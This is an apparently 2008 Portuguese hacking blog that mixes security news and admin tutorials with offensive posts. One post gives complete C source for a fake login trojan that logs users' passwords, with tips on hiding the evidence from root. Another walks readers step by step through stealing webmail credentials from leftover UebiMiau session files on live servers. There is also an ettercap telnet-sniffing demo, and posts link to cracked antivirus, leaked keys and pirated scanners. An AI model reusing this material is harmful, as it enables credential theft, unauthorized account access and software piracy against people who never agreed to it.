Securitty !

Ferramentas de segurança no Debian

2008-08-10T12:05:00.000-07:00

Ferramentas de verificação remota de vulnerabilidades:

nessus

raccess

whisker

nikto (substituto de whisker)

bass (non-free)

satan (non-free)

Ferramentas de varredura de rede:

nmap

xprobe

queso

knocker

isic

icmpush

nbtscan (para auditorias NetBIOS)

fragrouter

strobe (do pacote netdiag)

hping2 (Nota: desatualizado)

Redes Privadas Virtuais (VPN):

vtun

tunnelv

cipe

vpnd

tinc

secvpn

pptpd

freeswan, que está obsoleto e substituido por

openswan (http://www.openswan.org/)

Kaspersky Internet Security 7.0 [ Cracked ]

2008-08-10T12:02:00.000-07:00

Kaspersky !! Cracked Nunca Expira !!!

Anti-vírus com um jogo de componentes para aumentar a sua segurança. O software possui um centro de controle que unem os componentes, permitindo ao operador derrotar a maioria das ameaças de vírus ao seu sistema operacional. Automaticamente pode restaurar arquivos de sistema, retirando vírus e recuperando arquivos infeccionados.

Hospedagem: Easyshare

Tamanho: 31 MB

http://w15.easy-share.com/1701168806.html

Crackes adotam Facebook e MySpace para criar rede 'zumbi'

2008-08-07T06:10:00.000-07:00

Golpes identificados nesta semana pela empresa de segurança Kaspersky mostram que o foco de golpistas da internet está cada vez mais voltado a redes sociais. Depois de divulgar o uso do microblog Twitter para espalhar vírus, a companhia anunciou fraudes que se aproveitam da popularidade dos sites de relacionamento Facebook e MySpace.

Em todos os casos, os golpistas usam essas páginas para divulgar links maliciosos. Nas fraudes baseadas no Facebook e MySpace, os hackers ainda tentam transformar as máquinas invadidas em “zumbis”, para ajudar na propagação dos golpes. Controlados remotamente, esses PCs podem espalhar códigos fraudulentos e mandar spam, por exemplo.

O internauta contamina sua máquina quando clica em links sugeridos na página de amigos ou em mensagens internas das redes sociais, também enviadas por conhecidos. A partir daí, o PC infectado passa a divulgar esses mesmos links maliciosos -- sem a interferência do usuário da máquina --, para aumentar a quantidade de vítimas. A praga do MySpace se espalha criando comentários nas contas de amigos do internauta, enquanto a do Facebook produz mensagens de spam e as envia para todos na lista de amigos.

Em alguns casos, explica a Kaspersky, são sugeridos links que instalam nas máquinas códigos de rede. Quando o internauta do Facebook clica no endereço infecta seu computador com a praga do MySpace e vice-versa.

Geralmente escritos em inglês, os textos que induzem as vítimas a clicarem nos links têm variados assuntos: “Paris Hilton arremessa anões nas ruas”, “momentos engraçados”, “você precisa ver isso” e “meu amigo flagrou você com uma câmera escondida”, entre muitos outros. Vale tudo para chamar a atenção do internauta e fazer com que ele clique no endereço sugerido para se tornar a próxima vítima.

“Infelizmente, os usuários têm muita confiança no que diz respeito às mensagens deixadas por seus amigos em redes sociais. Portanto, a probabilidade de um usuário clicar em um link como este é muito alta”, disse Alexander Gostev, analista da Kaspersky.

Capturando senhas no Linux

2008-07-30T10:54:00.000-07:00

Como que funciona ?
Simples, É simulador de login, o cara que executa-lo encontrará a seguinte tela:

Darkstar Systems 4.2bsd / System V666

login: admin
Password: ******

Login Incorrect

E ele pensa que deve ter digitado a senha errada, digita de novo e entra no sistema. Porhám akela senha que ele digitou estava certa e foi gravada em um de seus arquivos. Note que este programa há para um sistema bsd4.2, altere as primeiras linhas da fonte (antes de compila-la) para o seu sistema.
Use os seguintes cmds para compila-lo:

cc horse.c -lcurses -ltermcap
mv a.out horse

Agora crie um arquivo chamado trap e coloque esses comandos:

horse
login

Para executar o trap digite:

source trap

Agora atualmente veja o file stuff no seu diretório home. Copie-os e
depois delete o file. Ele pode ser muito incriminante se o root le-lo.
Se você entende de C, pode alterar a fonte como preferir. Porhám se vc
não sabe nada de C, não mexa aà* que vc vai fazer merda.

----------horse.c------------------------------------------------------------

/* A mensagem abaixo deve ser alterada para se parecer com a mensagem que o sistema imprime quando pronto. Cada \n representa um carriage return
*/

define SYSTEM "\n\nDarkStar Systems 4.2bsd UNIX (acid0)\n\n"

define LOGIN "login: "

define PASSWORD "password:"

define WAIT 2

define INCORRECT "Login incorrect.\n"

define FILENAME "stuff"

include
include
int stop();

main()
{
char name[10], password[10];
int i;
FILE *fp, *fopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^\n]",name);
getchar();
noecho();
printf(PASSWORD);
scanf("%[^\n]",password);
printf("\n");
getchar();
echo();
sleep(WAIT);

if ( ( fp = fopen(FILENAME,"a") ) != NULL ) {
fprintf(fp,"login %s has password %s\n",name,password);
fclose(fp);
}

printf(INCORRECT);
endwin();
}

stop()
{
endwin();
exit(0);
}

Pronto xD~

Alternando Entre Contas De Usuário Pelo Prompt

2008-07-30T10:39:00.000-07:00

Você pode alternar ente usuários pelo Prompt de Comandos do Windows sem precisar realizar o logoff, caso precise acessar pastas e arquivos de outros usuários:

1. Abra o prompt de comandos;

2. Digite o seguinte comando: runas /user:*nomedocomputador\*contadeusuário explorer.exe

Pronto, agora você ira abrir o Windows Explorer, como se fosse o usuário especificado e poderá acessar os arquivos cujo apenas este usuário tenha permissão para acessar.

OBS: pode ser utilizando de varias formas utilizando o comando runas .

> runas /noprofile /user:mymachine\administrator cmd
> runas /profile /env /user:meu_domínio\admin "mmc %windir%\system32\dsa.msc"
> runas /env /user:user@domain.microsoft.com "notepad \"my file.txt\""

^^

Sniffing de atutenticação de telnet

2008-07-30T10:37:00.000-07:00

O Ettrcap pode ser utilizado para identificar nomes e senhas de usuário com thácnicas de sniffing transmitidas por uma rede durante a autentificação de telnet:

# ettercap -m -C -N

ettercap 0.6.7 (c) 2002 AloR & NaGa

Your IP: 10.0.0.102 with MAC: 01:11:04:03:6A:A3 on Iface: eth0

Loading plugins... Done.

Resolving 1 hostname...

* |================================================= ======> | 100.00%
Press 'h' for help...

Sniffing (Mac based): ANY<--> ANY

TCP + UDP packets... ( default )

Collecting passwords...

07:04:58 10.0.0.102:4814 <--> 192.168.1.1:23 telnet

User: admin
Pass: il0veteln3t

KDE 4.1 Lançado

2008-07-30T07:59:00.001-07:00

Link :

http://dot.kde.org/1217341401/

Screenshots:

http://www.kde.org/announcements/4.1/screenshots/

Agora vai hein ! xD

K-meleon 3.0

2008-07-29T08:44:00.000-07:00

K-meleon 3.0, O Navegador Mais Rápido Do Mundo !

já que tem a versão 3.5, mais é cheia de bug's, por isso estou colocando a melhor versão aqui !
E como ele é o navegador mais rápido? Veja você mesmo navegando com K-Meleon

Download

UebiMiau 2.7.2

2008-07-20T21:51:00.000-07:00

Somente UebiMiau com versões menores que 2.7.2 estão vulneraveis.

Seguinte... essa vulnerabilidade da acesso a path onde fica os arquivos de seção guardados, são arquivos temporários. Nesses arquivos contem dados das contas, são arquivos que são destruà*dos apos o usuário sair, mas acredito que pelo motivo dos usuários não saà*rem no link SAIR e sim no X ou mudam de site, esses arquivos continuem gravados na path.
Apos você ter acesso a esses arquivos eles estarão criptografados, ai você terá que descriptografar, há fácil explicarei detalhes por detalhes.
Vira muitos sites do tipo. www.exemplo.com.br/webmail/
Segundo passo: Explorando os sites.
Apos a pesquisa você achara sites do tipo
www.exemplo.com.br/webmail/
acrescente /database/_sessions/ apos /webmail/
ficara assim. www.exemplo.com.br/webmail/database/_sessions/
Pronto se aparecer arquivos do tipo:
{435B5077BE08A-435B5077C2FF1-1130057847}.usf
O webmail esta vulnerabilidade, se caso não aparecer nada, (a pasta _sessions, vazia) há porque ninguhám cometeu aquele erro de não CLIKAR no SAIR pra destruir esse arquivo.
*Mas esta vulnerabilidade, porem sem nenhum arquivo.
Caso Aparecer Page Not Found... ou Sem autorização pra abrir a pasta, há porque não esta vulnerável.
TERCEIRO PASSO: Descriptografar.
Apos achar os arquivos *.usf abra-o e veras uma string do tipow:
YTo1OntzOjU6ImVtYWlsIjtzOjIwOiJkbWdpdGFqYWlAZG1nLm NvbS5iciI7czo
0OiJ1c2VyIjtzOjk6ImRtZ2l0YWphaSI7czo0OiJwYXNzIjtzO jY6Iml0YWphaSI
7czo2OiJzZXJ2ZXIiO3M6Nzoid2VibWFpbCI7czo1OiJzdGFyd CI7aToxMTI5OT
M5MjQ3O30=
Bom aqui ela esta criptografada, agora vamos descriptografa-la.
Usamos o mIRC para executar essa proeza.
no mIRC digite na linha de conversação.. (onde você usa pra conversar)
//echo -a $decode(StringCriptografada, -m) e tecle enter.
pronto o resultado vira na hora.
*OBS: Não esqueça do // antes do echo, e do ,-m no final.
*OBS: Não use strings muito grande pra descriptografar, pois o mirc ele limita caracteres... caso você colocar a string apos o $decode( e depois vc for acrescentar os ,-m) e cada tecla que pressionar você ouvir um BIP soar, há pq o limite foi atingido, então comece a deletar o final da st5ring criptografada.
BLZ.. apos aparecer o resultado. que eh algo como:
a:9:{s:5:"email";s:18:"richard@TESTE.COM.br";s:4:" user";s:7:"richard";
s:4:"pass";s:6:"999611";s:6:"server";s:4:"mail";s: 5:"start";i:1130057847;
s:4:"auth";b:1;s:7:"folders";a:5:{i:0;a:1:{s:4:"na me";s:5:"inbox";
}i:1;a:1:{s:4:"name";s:5:"trash";}i:2;a:1:{s:4:"na me";s:4:"sent";}i:3;
a:1:{s:4:"name";s:8:"silvania";}i:4;
você vai ter os seguintes dados necessários para login:
USER: richard
SENHA: 999611
Agora há só voltar para a tela de login e se logar.
Pronto.. você teve sucesso.
Caso você saiba o LOGIN de algum usuário use
http://www.exemplo.com/database/user_domain/
Onde "user" há o usuário alvo e "domain" há o domà*nio alvo.
Ai você entrara no "esqueleto" da conta do usuário, tendo acesso aos e-mails e tudo mais.

By Dominiac

BSD UNIX Toolbox: 1000+ Commands for FreeBSD, OpenBSD

2008-07-16T08:29:00.000-07:00

1000+ Commands for FreeBSD, OpenBSD and NetBSD

Autor: Christopher Negus and Francois Caen
Páginas: 309
Publicado: Wiley (Maio 5, 2008)
Linguagem: Ingles

Download:

http://rapidshare.com/files/123801472/BSD.UNIX.Toolbox.1000.plus.Commands.4.Free.BSD.Open.BSD.and.Net.BSD-virTuAlZin.rar

Vulnerability Scanner Pack

2008-07-16T05:33:00.000-07:00

Scanner's:

- Core Impact 4
- Acunetix Web Vulnerability Scanner 5
- Nessus 3.6.0.1
- GFI LANguard Network Security Scanner v8
- Retina Network Security Scanner 5.15.7

Info:
Tamanho: 110MB
Arquivo em RAR
Hospedado em: xirror.com

Download:

http://xirror.com/spread/39225260/Vulnerability.Scanners.part1.rar.html
http://xirror.com/spread/39225260/Vulnerability.Scanners.part2.rar.html

Kaspersky KAS and KIS KEYS till 2009 & 2010

2008-07-12T13:07:00.001-07:00

1) Ir para ACTIVAÇÃO na Kaspersky .

2) Clique APAGAR Chave. ( apenas se uma chave tem sido anteriormente instalado )

3) Clique INSTALAR Chave.

4) Após esta , Aplicar existindo licença chave.

5) Seleccionar a chave que quizer fazer instalar.

6) Enjoy ! xD~

Download's:



http://rapidshare.com/files/116339764/Bruna.KAV_Key_Valid_till_27.02.2009.rar
http://rapidshare.com/files/116337643/Bruna.KAV_Personal_Key_Valid_Till_03.09.2010.rar
http://rapidshare.com/files/116338754/bruna.KIS.22.12.2010.rar
http://rapidshare.com/files/116338506/bruna.KIS.17.03.2009.rar
http://rapidshare.com/files/116338237/Bruna.Kis.8-04-2009.rar
http://rapidshare.com/files/116337916/Bruna.KIS.02.04.2009.rar

^^

iptables-1.4.1.1

2008-07-12T13:04:00.000-07:00

Descrição:
O iptables é construido em cima do netfilter , e suas alteração são para o Linux 2.4.x e 2.6.x. É um importante reescrever do seu antecessor ipchains , e é utilizado para controlo pacote filtragem , Network Address Translation ( masquerading, portforwarding, transparent proxying ), e efeitos especiais tais como pacote mutilar.

Pagina: http://www.iptables.org

MD5 Checksum: 723fa88d8a0915e184f99e03e9bf06cb
Download:
http://packetstormsecurity.org/linux/firewall/iptables/iptables-1.4.1.1.tar.bz2

O mínimo que você deveria aprender para se defender de ataques de injeção de SQL no PostgreSQL

2008-06-30T09:56:00.000-07:00

SQL Injection ou injeção de SQL é uma técnica de invasão de sistemas que se tornou famosa na Internet, mas pode ser utilizada em qualquer linguagem de programação. No entanto, na Internet temos uma combinação explosiva:

A aplicação está acessível para toda internet que possui milhares de usuários dispostos a quebrar seu sistema;
O uso de linguagens de script fracamente tipadas em conjunto com com tipos de dados fracamente tipados ajuda a abrir algumas brexas de segurança.
O protocolo HTTP tem peculiaridades que quando mal utilizadas podem tornar uma aplicação web mais vulnerável como o uso de parâmetros GET.

O exemplo clássico é o login de um usuário da aplicação. Você pede o nome e senha do usuário numa tela e depois envia um SQL com esta característica:

SELECT TRUE WHERE nome = 'telles' AND senha = 'abizi'

Na tela de login o usuário pode digitar no lugar da senha algo mais ou menos assim:

USUÁRIO: admin
SENHA: ‘ OR 1=1 –

Ao substituir as variáveis o seu SQL ficaria assim:

SELECT TRUE WHERE nome = 'admin' AND senha = '' OR 1=1 --'

Segurança contra o SQL Injection

Regra no mínimo privilégio:

Veja que há uma série de problemas a serem analisados aqui. A primeira questão que qualquer sistema deve se preocupar em analisar é saber qual o potencial de destruição que o usuário vai ter se ele conseguir um ataque bem sucedido. Se o usuário que se conecta na aplicação é dono de objetos no banco de dados, como muitas aplicações gostam de fazer por uma questão de comodidade, você verá que o seu usuário terá permissões plenas sobre os seus objetos. Utilizando SQL Injection, ele poderá realizar operações como DROP, TRUNCATE, ALTER além do DELETE, INSERT, UPDATE e SELECT.

Então a primeira regra que deve SEMPRE ser seguida a risca é que:

“O USUÁRIO QUE A APLICAÇÃO UTILIZA PARA SE CONECTAR NO BANCO DE DADOS JAMAIS DEVE SER O DONO DOS OBJETOS CRIADOS NO BANCO DE DADOS”

Alguns artigos que tratam sobre SQL Injection ignoram solenemente esta recomendação. Alguns ficam desempregados inesperadamente. Então, precauções especiais devem ser tomadas em aplicações onde cada usuário da aplicação não tem seu próprio usuário criado no banco de dados - o que é comum em aplicações web com milhares de usuários que surgem sem controle do DBA. Você deve ter pelo menos 4 usuários para cada aplicação com este perfil:

Um usuário que é dono dos objetos criados no banco de dados. Este usuário deve estar sob controle somente e tão somente do DBA, tanto no ambiente de testes como em produção. Lembre-se que este usuário tem poderes plenos sobre estes objetos do banco de dados.
Um usuário ou grupo de usuários destinado aos desenvolvedores com poderes específicos para as suas tarefas. Pode-se determinar que no ambiente de produção ele tenha permissão de SELECT em todas tabelas e sequências e no ambiente de produção tenha poderes de SELECT, INSERT, UPDATE e DELETE.
Um usuário ou grupo de usuários destinado aos administradores da aplicação, que terão poderes específicos na aplicação como deletar registros ou atualizar valores em tabelas. Este usuário deve se conectar a partir de outro executável que não o utilizado pelos usuários normais. A aplicação utilizada para fins administrativos deve ter acesso restrito ao acesso local por exemplo. Este usuário terá permissões de DELETE, UPDATE e INSERT em tabelas que um usuário normal não terá permissão. Portanto, este usuário jamais deve ser utilizado em operações de rotina.
Um usuário para os usuários normais da aplicação. Este usuário deve seguir a risca a regra no menor privilégio. Ele deve apenas as permissões para acessar os objetos estritamente necessários. Privilégios de UPDATE e DELETE devem ser concedidos com muita cautela. Operações deste tipo quando executadas sem uma clausula WHERE adequada podem ser desatrosas. É este usuário que será alvo de ataques de SQL Injection. Se você for rigoroso com as permissões para este usuário, limitará muito a dimensão dos estragos que podem acontecer no caso de um ataque bem sucedido.

Cya~

Slackshow 2008

2008-06-26T11:36:00.000-07:00

Pelo quarto ano consecutivo sera realizado em São Paulo o IV SlackShow, um evento voltado para tecnicos, com palestras tecnicas ministradas por tecnicos, *dias 22 e 23 de Agosto*. Esse ano contamos com a presenca de palestrantes internacionais como Alan Hicks (autor do The Book, manual do slackware), Eric Hameleers (responsavel por boa parte da configuracao de rede, das novidades do instalador e outras coisas) e Robby Workman (HAL, pacotes do KDE4, etc). Todos eles participam ativamente do desenvolvimento da nossa distribuicao e sao comitters do Slackbuilds.org. Ja estao confirmadas palestras sobre Perl, Desenvolvimento com XUL, Integracao com AD, Desenvolvimento do Slackware, Redes, etc. Esperamos contar com todos os fas de Slackware e quem gosta de software livre e tem sede de conhecimento.

Escreva-se:
http://slackshow.slackwarebrasil.org/?p=inscreva-se

Cya

Site falso disfarçado como ImageShack distribui malware

2008-06-25T09:55:00.000-07:00

Criadores de malwares conseguiram desenvolver um site falso que imita o popular ImageShack, o quinto maior site de hospedagem de imagens da Internet, fazendo com que os usuários cliquem em links para imagens falsas infectando assim suas máquinas e espalhando-se através de programas de mensagens instantâneas.

O ImageShack real é o imageshack.us, entretanto, os autores de malwares estão utilizando o domínio imageshaack .org, particularmente o imageshaack.org /img/Picture275.jpg, que é onde está localizado o malware. Uma vez que a máquina do usuário esteja infectada com o malware Backdoor.Win32.SdBot.eiu, o host entra em um canal IRC onde os criadores da rede de bots continuam a enviar comandos para que o malware se espalhe, como abaixo:

!msn.msg lool!! :D http ://imageshaack.org /img/Picture275.jpg |!trition.msg lool!! :D http ://imageshaack.org/img /Picture275.jpg topic set by Everglades on Wed Jun 11 15:41:57

“!msn.msg Haha is that you;)? http ://imageshaack.org /img/Picture275.jpg?|!trition.msg http: //imageshaack.org/img /Picture275.jpg

Remova vírus com o Kaspersky Rescue Disk

2008-06-24T12:48:00.000-07:00

Alguns vírus são muito destrutivos e difíceis de serem removidos do Windows quando o usuário não tem conhecimento para isso.

A boa notícia é que a Kaspersky está oferecendo um Rescue Disk (Disco de Recuperação) para fazer a varredura e remover vírus do computador sem a necessidade de iniciar o Windows. Uma grande vantagem é que você pode utilizar este CD em qualquer computador para detectar e eliminar os vírus ali existentes.

O Kaspersky Rescue Disk oferece uma maneira segura de remover um vírus de computador de maneira rápida, gratuita e sem o risco de ficar infectado. Tudo o que você precisa fazer é o download do arquivo ISO, gravar a imagem em um CD ou DVD e reiniciar o computador a partir desse disco.

Veja um passo-a-passo sobre como usar o Kaspersky Rescue Disk:

1. Faça o download da ISO do Kaspersky Rescue Disk.

2. Grave o CD com seu software de gravação de ISO/DVD.

3. Reinicie seu computador através do disco.

4. Aparecerá uma tela como a imagem abaixo. Pressione a tecla Enter para iniciar o Antivírus.

5. Depois que o Kaspersky Anti-Virus 2009 estiver carregado, escolha os discos rígidos que você deseja verificar e clique em Start scan.

6. O programa fará o resto.

Você pode utilizar este CD em qualquer computador para detectar e eliminar os vírus ali existentes.

Caso você esteja utilizando o Kaspersky Anti-Virus 2009 ou o Kaspersky Internet Security 2009 no seu computador, você também pode criar o seu próprio Rescue Disk, mas usá-lo em outros computadores poderá levar a conseqüências imprevisíveis, uma vez que contém informações sobre os parâmetros de um determinado computador.

:P

Firefox 3.0 já apresenta falha crítica de segurança

2008-06-24T12:43:00.000-07:00

Em Menos de um dia depois de seu lançamento oficial, foi descoberta uma vulnerabilidade no FireFox 3.0. De acordo com a Zero Day Initiative,da Tipping Point, a vulnerabilidade classificada como crítica foi reportada nas primeiras cinco horas depois do lançamento oficial do browser.

"Assim que a vulnerabilidade foi verificada no TippingPoint DVLabs e adquirida do pesquisador, ela foi reportada para a equipe deda Mozilla", disse um representante.

Embora a equipe da Zero Day Initiative não forneça detalhes específicos até que a desenvolvedora tenha uma chance de corrigi-la, o blog informou que esta vulnerabilidade, que também afeta o Firefox 2, precisa de interação do usuário e pode resultar na execução de código arbitrário.

A Mozilla informou que está trabalhando em uma correção. A Zero Day Initiative já foi criticada no passado por pagar pesquisadores que descobrem vulnerabilidades.

Bug no OpenOffice permite invasão

2008-06-11T09:45:00.001-07:00

Uma falha na suíte OpenOffice.org permite a execução remota de código na máquina vulnerável. O problema as versões de 2.0 a 2.4.

O erro se manifesta num estouro de memória durante a manipulação de alguns arquivos. A brecha pode ser utilizada para invadir o micro do usuário. Segundo o Projeto OpenOffice.org, não há notícia de que a falha tenha sido explorada.

A solução consiste em atualizar a suíte para a versão 2.4.1. Usuários das versões de 2.0 a 2.4, inclusive, devem fazer o upgrade.

Será? rs

Microsoft Resolve Liberar Código Fonte de Windows Vista

2008-06-09T07:05:00.000-07:00

Memoria Flash agora em Servidores

2008-06-09T06:39:00.000-07:00

Após a onda de MIDs (Móbile Internet Device) substituindo os antigos Discos Rígidos por cartões de memória sólida (SSD), agora é a vez de uma grande fabricante de Servidores anunciar que seus servidores virão equipados com o mesmo tipo de Disco.

A Sun anuncia que a partir do segundo semestre desse ano seus servidores virão equipados com discos em estado sólido. A fabricante afirma que está baseando sua decisão no melhor desempenho e na economia de energia, até 5 vezes menos, gerada por esse modelo.

Os entusiastas pelo Software Livre também tem uma boa noticia, a Sun anuncia que seus discos serão otimizados para trabalhar com o banco de dados MySQL e com o Solaris ZFS (Zettabyte File Systems), o sistema de arquivos do sistema operacional Solaris.

Os discos sólidos já são uma realidade, porem o alto custo por Gigabyte ainda impede a grande massificação dessa tecnologia. Com grandes fabricantes utilizando-a com certeza o aumento de demanda fará com que esses preços caiam nos próximos anos, e quem sabe em pouquíssimo tempo poderemos ter essa tecnologia em nossos PCs domésticos.

Monitorando redes utilizando Ntop

2008-06-04T10:20:00.000-07:00

A maioria dos administradores de redes de pequeno e médio porte, desconhecem softwares que auxiliam nessas tarefas. Um deles é o Ntop, software open-source de fácil instalação e interpretação.

Ao final deste artigo você será capaz de:

Instalar e configurar o Ntop
Acessar via browser os relatórios

Considerações Iniciais

Utilizaremos duas ferramentas de instalações. A primeira é a urpmi, utilizada em algumas distribuições como a Mandriva e etc. A Segunda é o APT-GET, utilizado em outras distribuições como Ubuntu e etc.

Este texto é original do livro Mandriva / Cap 6, e adaptado por Guilherme S Zanoni.

Para Saber mais: Network Top - Ntop

Ntop e suas funcionalidades

O Ntop é um programa que monitora passivamente uma rede, coletando dados sobre os protocolos e sobre os hosts da rede.

Características e Funcionalidades:

Analisa os pacotes que trafegam na rede;
Lista e ordena o tráfego de rede de acordo com vários protocolos;
Exibe estatísticas de tráfego;
Armazena estatísticas de forma permanentemente em bancos de dados;
Identifica passivamente várias informações obre os hosts da rede, incluindo o sistema operacional executado e endereço de e-mail do usuário da estação;
Exibe a distribuição do tráfego IP entre vários protocolos da camada de aplicação;
Decodifica vários protocolos da camada de aplicação, inclusive os encontrados em softwares do tipo P2P;
Atua como coletor de fluxos gerados por roteadores e switches através da tecnologia NETFLOW;
Possui um WebServer integrado que permite consultas às informações através de um browser.

Instalação do Ntop

Para instalar o Ntop no Mandriva Linux, utilize o urpmi:

#urpmi ntop -auto

Para instalar o Squid no Ubuntu, utilize o apt-get:

#apt-get install ntop

O código fonte do Ntop pode ser obtido no site oficial do projeto listado na seção "Para saber mais".

Vale observar que, além da instalação do programa, outras operações foram efetuadas no seu servidor/desktop, entre elas:

O usuário "ntop" foi adicionado ao sistema e será usado para executar o processo ntop;
O arquivo de inicialização foi instalado em /etc/rc.d/init.d/ntop (Mandriva) e /etc/init.d/ntop (Ubuntu) e configurado para ser iniciado no boot.

Configurando o Ntop

O Ntop não é um software que possui arquivos de configurações editáveis. Alguns parâmetros podem ser setados pela interface web, mas a maioria deles são opções passadas pela linha de comando, no momento da inicialização.

Primeira execução do Ntop

Por default, o Ntop é inicializado no boot como um deamon, ou seja, um processo que rodará em Background, sem um terminal controlador. Se tentarmos inicializá-lo desta forma, as seguintes mensagens de erro serão logadas via syslog:

/var/log/messages:

Jun 28 13:51:12 ntop[3327]: INITWEB: initializing web server

Jun 28 13:51:12 ntop[3327]:

FATAL ERROR

No password for admin user - please re-run ntop in non-deamon mode first

Ou seja, você deverá criar logo após a instalação um senha para o usuário que administrará o Ntop. Para fazê-lo, basta usar o comando abaixo:

# /usr/sbin/ntop -P /var/lib/ntop -U ntop -A

Thu Jun 28 13:55:14 2007 Initializing gdbm databases

Please enter the password for the admin user: <--- Digite uma senha

Please enter the password again: <--- Confirme a senha

Thu Jun 28 13:55:14 2007 Admin user password has been set

Pronto, agora poderemos inicializar o serviço Ntop corretamente:

No Mandriva Linux:

Na pasta /etc/rc.d/init.d/ digite:

# ./ntop start

No Ubuntu Linux:

Na pasta /etc/init.d/ digite:

# ./ntop start

Parâmetros Adicionais

Lista de parâmetros mais úteis:

Para editar o arquivo que carrega os parâmetros inicias, edite o seguinte arquivo

/etc/sysconfig/ntop:

Exemplo:

extra_arg="-i eth0,eth1 -W 3001"

Monitoramento de protocolos adicionais

Por padrão, o Ntop monitora apenas um conjunto reduzido de protocolos, listados na tabela a seguir:

Este conjunto de procolos pode ser substituído pelo administrador através do parâmetro de execução -p, que recebe o nome de um arquivo contendo os protocolos à monitorar como argumento.

Edite o arquivo /etc/sysconfig/ntop:

Extra_arg="-i eth0,eth1 -W 3001 -p /usr/libntop/ntop/new-protocol.list

Usando o Ntop

Após a instalação e configuração inicial, podemos acessar a interface Web pelo endereço http://servidor.empresa:3000 ou via https://servidor.empresa:3001 (caso tenha habilitado HTTPS na porta 3001).

A partir do menu superior podemos acessar todas as opções de interface Web.

Dicas

Para utilizar o Ntop apenas como coletor de fluxos NetFlow, desabilitando a captura de tráfego em interfaces de redes físicas da maquina onde ele é executado, utilize "nome" como argumento da opção -i, na linha de comando.

Edite o arquivo /etc/sysconfig/ntop:

Extra_arg="-i nome"

Para permitir que apenas usuários autenticados acessem as páginas da interface web do Ntop, acesse no menu Admin > Configure > Protect URLS. No rodapé da tabela clique em "ADD URL", não preencha o campo URL, apenas selecione os usuários que você quer autorizar e clique no botão "ADD URL". A palavra chave "*" será adicionada à lista, representando todas as páginas da interface web e garantindo que a autenticação sempre será solicitada.

Especialistas querem usar botnets como meio de defesa

2008-06-04T09:34:00.000-07:00

Especialistas da Universidade de Washington, nos Estados Unidos, chegaram à conclusão de que uma boa maneira de neutralizar ataques de redes botnets, em que computadores infectados por malware são utilizados, é usar uma tecnologia semelhante para proteção.

Um novo sistema da universidade, Phalanx, utiliza sua própria rede para batalhar contra o "exército zumbi" e garantir que nenhum ataque, ou apenas uma pequena porcentagem deles, chegue ao servidor principal, conforme noticiou o site PC Pro.

A idéia é que a rede seja utilizada como escudo e que todas as informações de requisição ao servidor passe, antes, por pontos interligados desta rede, chamados de "computadores mailbox". Por enviar pacotes em seqüências aleatórias, os ataques dificilmente chegariam ao servidor...

O Phalanx ainda poderia exigir que os computadores requerentes solucionassem um puzzle criptográfico, algo que seria solucionado em apenas alguns segundos em uma conexão comum, mas que no caso de um ataque DoS, com múltiplas requisições, seria significativamente atrasado.

Ao NewScientist, o pesquisador Colin Dixon, envolvido no projeto, explica que a proteção poderia ser feita pela própria rede de computadores que as grandes empresas utilizam para servir conteúdo.

Em um teste, foi simulado um ataque por uma botnet com um milhão de zumbis, contra uma rede de 7.200 computadores mailbox organizada pelo Phalanx. Mesmo que muitos ataques tenham sido feitos contra estes mailboxes, o servidor não foi sobrecarregado e continuou funcionando normalmente.

O Phalanx não está destinado apenas a redes corporativas, e em breve poderá ser utilizado em máquinas domésticas. "Como trabalho futuro, estamos pensando em explorar uma modificação de um popular cliente BitTorrent para converter os milhões de usuários BitTorrent em uma comunidade de defesa botnet", declararam os criadores da nova tecnologia, acrescentando que um único grande provedor poderia implementar uma solução DoS eficiente para seus clientes sem precisar entrar em um acordo global com outros provedores.

Fonte: http://magnet.pro.br

Apresentando o OpenSolaris

2008-05-30T09:23:00.001-07:00

Neste artigo apresento o Projeto OpenSolaris da Sun Microsystems. Vou trabalhar basicamente em três aspectos:

Apresentanndo o OpenSolaris
Obtendo o DVD de instalação
Instalação básica do OpenSolaris.

O que é o OpenSolaris

OpenSolaris é um projeto criado pela Sun Microsystems para criar uma comunidade de desenvolvedores em volta do sistema operacional Solaris. O projeto é baseado no código fonte do Solaris. Este projeto tem como base:

Inovação
Colaboração
Extensão da tecnologia OpenSolaris

Entendendo o OpenSolaris e o SO Solaris

O SO Solaris da SUN continua sendo o SO comercial. Versões futuras do Solaris serão baseadas nas novas tecnologias do projeto OpenSolaris. Entenda que o OpenSolaris é o código base para o desenvolvimento do Solaris.

O projeto OpenSolaris consiste em:

Disponibilizar o código fonte do OpenSolaris.
Comunidade de desenvolvedores
E um website para colaboração. O site é este em inglês http://opensolaris.org/os/ - a versão em português está disponível em http://br.opensolaris.org/

No site http://br.opensolaris.org/ é possível obter detalhes sobre este projeto que tem por objetivo ser um dos SO mais utilizados no mundo e ser um rival ao Linux.

Fonte: http://www.theinquirer.net/en/inquirer/news/2007/09/04/open-solaris-is-a--linux-killer

Minhas impressões sobre o OpenSolaris

Bem, depois de dois meses de espera, finalmente chegaram os DVDs do OpenSolaris totalmente gratuito (mais detalhes no próximo artigo). A instalação foi bem simples igual a qualquer distro Linux. Se o usuário já sabe Linux no Modo Gráfico, não vai sentir dificuldades ao usar o OpenSolaris. Veja a ilustração:

Gerenciando o Windows 2000/2003 a partir do Linux

2008-05-30T09:19:00.000-07:00

Pré-requisitos

É necessário, para fazer os testes de forma prática, que você tenha alguma versão do Windows com o Terminal Services instalado. Também é necessário ter um computador com o Linux.

Definindo o Terminal Services

Vamos definir de forma simples o que é o TS (Terminal Services) - é um programa que permite o acesso remoto a um computador com o Windows. Por padrão, no Windows Server 2003, o Terminal Services já vem instalado e é necessário apenas habilitar esta opção.

RDP - Remote Desktop Protocol - é o protocolo utilizado para a comunicação entre um computador cliente e um servidor com o Terminal Services instalado.

Habilitando o Acesso Remoto no Windows Server 2003

1. Acesse o servidor com um usuário com privilégios administrativos.

2. Clique no botão Start, depois em My Computer com o botão direito.

3. Agora, clique em Remote.

4. Marque a opção Enable Remote Desktop on this computer.

5. Agora, clique no botão Ok.

Veja a ilustração:

É bem simples e, por default, apenas o usuário com privilégios administrativos (no caso o Administrator) tem estes "poderes".

Preparando o Linux para acessar o servidor Microsoft

Através do Linux, vamos acessar remotamente um servidor Linux. É bem simples todo o processo. O programa do Linux que vamos usar é o rdesktop.

Verificando se o rdesktop está instalado

1. Em distribuições baseadas em pacotes rpm, digite rpm -qa | grep rdesktop.

Caso não seja informado nada, é porque o pacote não está instalado.

2. Acesse o local onde está o pacote rpm e digite rpm -ivh rdesktop-1.3.1-5.i386.rpm.

Veja a ilustração abaixo:

3. Repita a consulta digitando rpm -qa | grep rdesktop.

